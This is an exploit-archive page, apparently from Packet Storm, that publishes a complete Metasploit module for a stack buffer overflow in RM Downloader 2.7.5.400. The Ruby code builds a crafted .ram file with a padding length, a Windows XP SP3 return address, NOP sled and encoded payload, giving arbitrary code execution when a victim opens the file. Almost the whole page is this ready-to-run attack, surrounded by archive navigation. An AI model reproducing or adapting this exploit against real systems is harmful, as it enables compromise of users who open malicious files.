RM Downloader 2.7.5.400 Local Buffer Overflow

RM Downloader 2.7.5.400 Local Buffer Overflow: Posted May 5, 2015; Authored by TUNISIAN CYBER | Site metasploit.com; This Metasploit module exploits a stack buffer overflow in RM Downloader version 2.7.5.400 by creating a specially crafted .ram file allowing an attacker the able to execute arbitrary code.; tags | exploit, overflow, arbitrary; SHA-256 | 293cb8c3c282805664ef99e29f1a66bbc60b01027640ccdda575edd5305c83d4; Download | Favorite | View

RM Downloader 2.7.5.400 Local Buffer Overflow

###
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow (MSF)
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Twitter: @TCYB3R
##
   
##
# $Id: rmdownloader_bof.rb  2015-04-01 03:03  TUNISIAN CYBER $
##
   
require 'msf/core'
    
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
    
  include Msf::Exploit::FILEFORMAT
    
   def initialize(info = {})
    super(update_info(info,
     'Name' => 'RM Downloader v2.7.5.400 Local Buffer Overflow',
         'Description' => %q{
          This module exploits a stack buffer overflow in RM Downloader v2.7.5.400
          creating a specially crafted .ram file, an attacker may be able 
      to execute arbitrary code.
        },
     'License' => MSF_LICENSE,
     'Author' => 
           [
            'TUNISIAN CYBER', # Original
            'TUNISIAN CYBER' # MSF Module
            ],
     'Version' => 'Version 2.7.5.400',
     'References' =>
        [
         [ 'URL', 'https://www.exploit-db.com/exploits/36502/' ],
        ],
    'DefaultOptions' =>
       {
        'EXITFUNC' => 'process',
       },
     'Payload' =>
      {
        'Space' => 1024,
        'BadChars' => "\x00\x0a\x0d",
        'StackAdjustment' => -3500,
      },
     'Platform' => 'win',
     'Targets' =>
       [
        [ 'Windows XP-SP3 (EN)', { 'Ret' => 0x7C9D30D7} ]
       ],
      'Privileged' => false,
      'DefaultTarget' => 0))
    
      register_options(
       [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.ram']),
       ], self.class)
    end
    
    def exploit
   
    sploit = rand_text_alphanumeric(35032) # Buffer Junk
      sploit << [target.ret].pack('V')
      sploit << make_nops(4)
      sploit << payload.encoded
   
      tc = sploit
      print_status("Creating '#{datastore['FILENAME']}' file ...")
      file_create(tc)
   
    end
    
end

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

RM Downloader 2.7.5.400 Local Buffer Overflow

RM Downloader 2.7.5.400 Local Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

RM Downloader 2.7.5.400 Local Buffer Overflow

Share This

RM Downloader 2.7.5.400 Local Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems